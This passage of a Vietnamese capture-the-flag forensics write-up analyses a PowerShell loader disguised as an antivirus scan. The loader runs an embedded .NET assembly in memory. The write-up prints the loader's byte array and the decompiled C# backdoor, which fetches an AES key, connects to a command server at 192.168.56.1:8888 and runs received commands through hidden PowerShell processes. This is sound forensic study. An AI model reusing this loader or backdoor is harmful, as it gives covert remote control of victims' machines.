8,0x03,0x20,0x00,0x01,0x05,0x20,0x01,0x01,0x11,0x11,0x04,0x20,0x01,0x01,0x0e,0x04,0x20,
0x01,0x01,0x05,0x0a,0x07,0x04,0x12,0x45,0x12,0x49,0x12,0x4d,0x1d,0x05,0x0a,0x20,0x03,0x01,0x12,0x7d,0x12,0x41,0x11,0x80,0x81,0x05,0x20,0x01,0x01,0x12,0x7d,0x04,0x20,0x00,0x1d,0x05,0x09,0x07,0x04,0x12,0x45,0x12,0x49,0x12,0x51,0x0e,0x05,0x20,0x01,0x01,0x1d,0x05,0x03,0x20,0x00,0x0e,0x18,0x07,0x0d,0x12,0x55,0x12,0x41,0x12,0x41,0x12,0x59,0x12,0x5d,0x1d,0x05,0x08,0x0e,0x0e,0x1d,0x05,0x1d,0x05,0x02,0x12,0x61,0x04,0x00,0x00,0x12,0x55,0x05,0x20,0x02,0x01,0x1c,0x18,0x05,0x00,0x01,0x01,0x12,0x6d,0x05,0x20,0x01,0x1d,0x05,0x0e,0x05,0x00,0x00,0x12,0x80,0x9d,0x06,0x20,0x01,0x01,0x11,0x80,0xa1,0x08,0x20,0x02,0x12,0x41,0x1d,0x05,0x1d,0x05,0x05,0x20,0x02,0x01,0x0e,0x08,0x04,0x20,0x00,0x12,0x5d,0x07,0x20,0x03,0x08,0x1d,0x05,0x08,0x08,0x12,0x10,0x01,0x02,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x08,0x03,0x0a,0x01,0x05,0x0d,0x10,0x01,0x01,0x1d,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x05,0x00,0x01,0x1d,0x05,0x08,0x18,0x10,0x01,0x02,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x07,0x20,0x03,0x01,0x1d,0x05,0x08,0x08,0x03,0x20,0x00,0x08,0x06,0x07,0x03,0x12,0x65,0x0e,0x0e,0x05,0x00,0x02,0x0e,0x0e,0x0e,0x04,0x20,0x01,0x01,0x02,0x06,0x20,0x01,0x01,0x12,0x80,0xb9,0x03,0x20,0x00,0x02,0x04,0x20,0x00,0x12,0x51,0x03,0x07,0x01,0x02,0x08,0xb0,0x3f,0x5f,0x7f,0x11,0xd5,0x0a,0x3a,0x08,0xcc,0x7b,0x13,0xff,0xcd,0x2d,0xdd,0x51,0x03,0x06,0x12,0x0c,0x03,0x06,0x12,0x6d,0x07,0x00,0x02,0x1d,0x05,0x0e,0x12,0x41,0x07,0x00,0x02,0x0e,0x1d,0x05,0x12,0x41,0x03,0x00,0x00,0x01,0x04,0x00,0x01,0x0e,0x0e,0x0a,0x20,0x04,0x02,0x1c,0x12,0x71,0x12,0x75,0x11,0x79,0x08,0x01,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x00,0x01,0x00,0x54,0x02,0x16,0x57,0x72,0x61,0x70,0x4e,0x6f,0x6e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x54,0x68,0x72,0x6f,0x77,0x73,0x01,0x08,0x01,0x00,0x07,0x01,0x00,0x00,0x00,0x00,0x3d,0x01,0x00,0x18,0x2e,0x4e,0x45,0x54,0x43,0x6f,0x72,0x65,0x41,0x70,0x70,0x2c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x76,0x38,
0x2e,0x30,0x01,0x00,0x54,0x0e,0x14,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x44,0x69,0x73,0x70,0x6c,0x61,0x79,0x4e,0x61,0x6d,0x65,0x08,0x2e,0x4e,0x45,0x54,0x20,0x38,0x2e,0x30,0x0d,0x01,0x00,0x08,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x00,0x00,0x0a,0x01,0x00,0x05,0x44,0x65,0x62,0x75,0x67,0x00,0x00,0x0c,0x01,0x00,0x07,0x31,0x2e,0x30,0x2e,0x30,0x2e,0x30,0x00,0x00,0x33,0x01,0x00,0x2e,0x31,0x2e,0x30,0x2e,0x30,0x2b,0x62,0x33,0x33,0x36,0x37,0x63,0x37,0x37,0x64,0x61,0x64,0x62,0x35,0x32,0x38,0x39,0x62,0x65,0x62,0x30,0x37,0x63,0x61,0x63,0x35,0x32,0x37,0x33,0x38,0x35,0x30,0x34,0x61,0x30,0x66,0x35,0x63,0x30,0x33,0x39,0x00,0x00,0x05,0x01,0x00,0x02,0x00,0x00,0x05,0x01,0x00,0x00,0x00,0x00,0x05,0x01,0x00,0x01,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x08,0x01,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xed,0x46,0xf1,0xf4,0x00,0x01,0x4d,0x50,0x02,0x00,0x00,0x00,0x61,0x00,0x00,0x00,0x40,0x33,0x00,0x00,0x40,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x27,0x00,0x00,0x00,0xa1,0x33,0x00,0x00,0xa1,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x52,0x53,0x44,0x53,0x16,0x64,0xfc,0x88,0x46,0xd1,0x0f,0x4c,0x88,0x16,0x2a,0x62,0x5d,0x28,0x9c,0x20,0x01,0x00,0x00,0x00,0x43,0x3a,0x5c,0x55,0x73,0x65,0x72,0x73,0x5c,0x4d,0x69,0x63,0x68,0x61,0x42,0x5c,0x77,0x68,0x2d,0x62,0x74,0x73,0x5c,0x66,0x6f,0x72,0x65,0x6e,0x73,0x69,0x63,0x73,0x32,0x5c,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x5c,0x6f,0x62,0x6a,0x5c,0x44,0x65,0x62,0x75,0x67,0x5c,0x6e,0x65,0x74,0x38,0x2e,0x30,0x5c,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x2e,0x70,0x64,0x62,0x00,0x53,0x48,0x41,0x32,0x35,0x36,0x00,0x16,0x64,0xfc,0x88,0x46,0xd1,0x0f,0x4c,0x48,0x16,0x2a,0x62,0x5d,0x28,0x9c,0x20,0xed,0x46,0xf1,0xf4,0x83,0x26,0xff,0xdc,0x33,0xbb,0x1f,0xf1,0x9d,0xfb,0xf3,0xcd,0xf0,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x34,0x00,0x00,0x00,0x20,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5f,0x43,0x6f,0x72,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x00,0x6d,0x73,0x63,0x6f,0x72,0x65,0x65,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x10,0x00,0x00,0x00,0x18,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x58,0x40,0x00,0x00,0x14,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x03,0x34,0x00,0x00,0x00,0x56,0x00,0x53,0x00,0x5f,0x00,0x56,0x00,0x45,0x00,0x52,0x00,0x53,0x00,0x49,0x00,0x4f,0x00,0x4e,0x00,0x5f,0x00,0x49,0x00,0x4e,0x00,0x46,0x00,0x4f,0x00,0x00,0x00,0x00,0x00,0xbd,0x04,0xef,0xfe,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x01,0x00,0x56,0x00,0x61,0x00,0x72,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x49,0x00,0x6e,0x00,0x66,0x00,0x6f,0x00,0x00,0x00,0x00,0x00,0x24,0x00,0x04,0x00,0x00,0x00,0x54,0x00,0x72,0x00,0x61,0x00,0x6e,0x00,0x73,0x00,0x6c,0x00,0x61,0x00,0x74,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x04,0x74,0x02,0x00,
0x00,0x01,0x00,0x53,0x00,0x74,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x67,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x49,0x00,0x6e,0x00,0x66,0x00,0x6f,0x00,0x00,0x00,0x50,0x02,0x00,0x00,0x01,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x34,0x00,0x62,0x00,0x30,0x00,0x00,0x00,0x32,0x00,0x09,0x00,0x01,0x00,0x43,0x00,0x6f,0x00,0x6d,0x00,0x70,0x00,0x61,0x00,0x6e,0x00,0x79,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x3a,0x00,0x09,0x00,0x01,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x73,0x00,0x63,0x00,0x72,0x00,0x69,0x00,0x70,0x00,0x74,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x08,0x00,0x01,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x00,0x00,0x3a,0x00,0x0d,0x00,0x01,0x00,0x49,0x00,0x6e,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6c,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x02,0x00,0x01,0x00,0x4c,0x00,0x65,0x00,0x67,0x00,0x61,0x00,0x6c,0x00,0x43,0x00,0x6f,0x00,0x70,0x00,0x79,0x00,0x72,0x00,0x69,0x00,0x67,0x00,0x68,0x00,0x74,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x42,0x00,0x0d,0x00,0x01,0x00,0x4f,0x00,0x72,0x00,0x69,0x00,0x67,0x00,0x69,0x00,0x6e,0x00,0x61,0x00,0x6c,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x32,0x00,0x09,0x00,0x01,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x64,0x00,0x75,
0x00,0x63,0x00,0x74,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x2f,0x00,0x01,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x64,0x00,0x75,0x00,0x63,0x00,0x74,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2b,0x00,0x62,0x00,0x33,0x00,0x33,0x00,0x36,0x00,0x37,0x00,0x63,0x00,0x37,0x00,0x37,0x00,0x64,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x35,0x00,0x32,0x00,0x38,0x00,0x39,0x00,0x62,0x00,0x65,0x00,0x62,0x00,0x30,0x00,0x37,0x00,0x63,0x00,0x61,0x00,0x63,0x00,0x35,0x00,0x32,0x00,0x37,0x00,0x33,0x00,0x38,0x00,0x35,0x00,0x30,0x00,0x34,0x00,0x61,0x00,0x30,0x00,0x66,0x00,0x35,0x00,0x63,0x00,0x30,0x00,0x33,0x00,0x39,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x08,0x00,0x01,0x00,0x41,0x00,0x73,0x00,0x73,0x00,0x65,0x00,0x6d,0x00,0x62,0x00,0x6c,0x00,0x79,0x00,0x20,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x0c,0x00,0x00,0x00,0x1c,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00;$assembly = [System.Reflection.Assembly]::Load($data);$type = $assembly.GetType("Executor");$method = $type.GetMethod("Run");$method.Invoke($null, $null); };Write-Host "Welcome to the BTS Antivirus!!!";Write-Host "Starting full system scan...";Start-Job -ScriptBlock $sb | Out-Null;Start-Sleep 10;Write-Host "Scan complete - no viruses found :D"
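  • Đoạn mã PowerShell này nạp một assembly .NET trực tiếp từ mảng byte bằng [System.Reflection.Assembly]::Load (không cần ghi DLL ra đĩa), sau đó gọi phương thức Run của lớp Executor bên trong một job chạy nền (Start-Job). Các dòng Write-Host giả làm "BTS Antivirus" chỉ là màn che trong lúc job đó chạy.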
  • Sử dụng cyberchef để lưu file này về và tiến hành phân tích
  • image
  • Bước đầu ta xác định được file sử dụng .NET
  • image
  • Sử dụng dnSpy để xem mã nguồn của nó
// Decompiled entry point of the Executor class; the PowerShell loader reaches it through
// GetMethod("Run") and Invoke. Behaviour visible here: obtain an AES key over HTTPS, open a
// TCP session to 192.168.56.1:8888, then repeatedly decrypt a received command, run it via
// ExecuteCommand and send the encrypted output back.
public static void Run()
{
	using (Aes aes = Aes.Create())
	{
		// The validation callback returns true for every certificate, so the HTTPS request
		// below accepts any server certificate (including a self-signed one).
		ServicePointManager.ServerCertificateValidationCallback = (([Nullable(1)] object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
		// The key is fetched at run time and is not stored in the assembly. The fetch is over
		// TLS, so a packet capture alone does not reveal it; it exists only in process memory.
		aes.Key = new WebClient().DownloadData("https://192.168.56.1:5000/get_key");
		// Static IV: the UTF-8 bytes of a hard-coded 16-character string.
		aes.IV = Encoding.UTF8.GetBytes("Z6LhFDiCgfOB8HNK");
		// The decompiler prints the raw enum value; CipherMode 1 is CBC.
		aes.Mode = 1;
		// One encryptor and one decryptor are created up front and reused for every message.
		// NOTE(review): the decryption script later on the page treats each message as a fresh
		// CBC stream under this IV, which matches the transforms resetting per message - confirm.
		ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);
		ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);
		using (TcpClient tcpClient = new TcpClient("192.168.56.1", 8888))
		{
			using (NetworkStream stream = tcpClient.GetStream())
			{
				byte[] array = new byte[4096];
				try
				{
					for (;;)
					{
						// Inbound data has no framing: whatever a single Read returns (at most
						// 4096 bytes) is decrypted as one complete command.
						int count = stream.Read(array, 0, array.Length);
						string command = Executor.Decrypt(array.Take(count).ToArray<byte>(), decryptor);
						string plaintext = Executor.ExecuteCommand(command);
						byte[] array2 = Executor.Encrypt(plaintext, encryptor);
						// Outbound data is framed: the 4 bytes of the int ciphertext length
						// come first, then the ciphertext itself.
						byte[] bytes = BitConverter.GetBytes(array2.Length);
						stream.Write(bytes.Concat(array2).ToArray<byte>(), 0, array2.Length + 4);
					}
				}
				catch (Exception ex)
				{
					// On any exception the message text is written to the socket as UTF-8,
					// with neither encryption nor the 4-byte length prefix, and the loop ends.
					stream.Write(Encoding.UTF8.GetBytes(ex.Message), 0, ex.Message.Length);
				}
			}
		}
	}
}

// Runs one received command as "powershell.exe -Command <command>" and returns what the
// child process wrote to standard output.
// For defenders: every command therefore shows up as a powershell.exe process creation with
// the command text on its command line.
private static string ExecuteCommand(string command)
{
	Process process = new Process
	{
		StartInfo = new ProcessStartInfo
		{
			FileName = "powershell.exe",
			// The command string is appended to the argument line as received.
			Arguments = "-Command " + command,
			RedirectStandardOutput = true,
			// UseShellExecute must be false for the stream redirection to be allowed.
			UseShellExecute = false,
			// No console window is created for the child process.
			CreateNoWindow = true,
			// Standard error is redirected but never read below, so error text is not returned.
			RedirectStandardError = true
		}
	};
	process.Start();
	// Read all of stdout first, then wait for the process to exit.
	string result = process.StandardOutput.ReadToEnd();
	process.WaitForExit();
	return result;
}
// Encrypts a string with the supplied transform and returns the ciphertext bytes.
// The text is written through a StreamWriter that is given no explicit encoding.
private static byte[] Encrypt(string plaintext, ICryptoTransform encryptor)
{
	MemoryStream memoryStream = new MemoryStream();
	byte[] result;
	// The decompiler prints the raw enum value; CryptoStreamMode 1 is Write.
	using (CryptoStream cryptoStream = new CryptoStream(memoryStream, encryptor, 1))
	{
		using (StreamWriter streamWriter = new StreamWriter(cryptoStream))
		{
			streamWriter.Write(plaintext);
		}
		// The writer is disposed before this copy, so everything it buffered has already
		// been pushed through the CryptoStream into memoryStream.
		result = memoryStream.ToArray();
	}
	return result;
}
// Decrypts a ciphertext buffer with the supplied transform and returns the result as text.
// The plaintext is read through a StreamReader that is given no explicit encoding.
private static string Decrypt(byte[] ciphertext, ICryptoTransform decryptor)
{
	MemoryStream memoryStream = new MemoryStream(ciphertext);
	string result;
	// The decompiler prints the raw enum value; CryptoStreamMode 0 is Read.
	using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, 0))
	{
		using (StreamReader streamReader = new StreamReader(cryptoStream))
		{
			// Reads until the CryptoStream is exhausted, i.e. the whole buffer is one message.
			result = streamReader.ReadToEnd();
		}
	}
	return result;
}
  • Chú ý hàm Run ta thấy IV được khai báo từ chuỗi Z6LhFDiCgfOB8HNK và key được lấy từ https://192.168.56.1:5000/get_key sau đó thực thi và gửi dữ liệu lên 192.168.56.1:8888
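  • Tại dòng stream.Write(bytes.Concat(array2).ToArray<byte>(), 0, array2.Length + 4); ta thấy rằng chúng sẽ gửi trước 4 byte để xác định độ dài dữ liệu truyền đi. Đây là lý do script giải mã bên dưới bỏ 8 ký tự hex đầu ([8:]) của mỗi dòng dữ liệu máy victim gửi đi; chiều ngược lại (lệnh gửi tới victim) không có 4 byte độ dài này.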
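  • Vấn đề là chúng ta không tìm được key trong wireshark: key được tải về qua HTTPS nên nội dung đã bị TLS mã hóa trong file pcapng. Tuy nhiên key vẫn nằm trong bộ nhớ của tiến trình khi nó đang chạy, vì vậy ta chuyển hướng sang file DMP.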
  • Ý tưởng của mình là sử dụng Windbg để trích xuất key trong thread của quá trình giải mã, tuy nhiên mình không tìm được nên phải chuyển sang công cụ bulk_extractor.
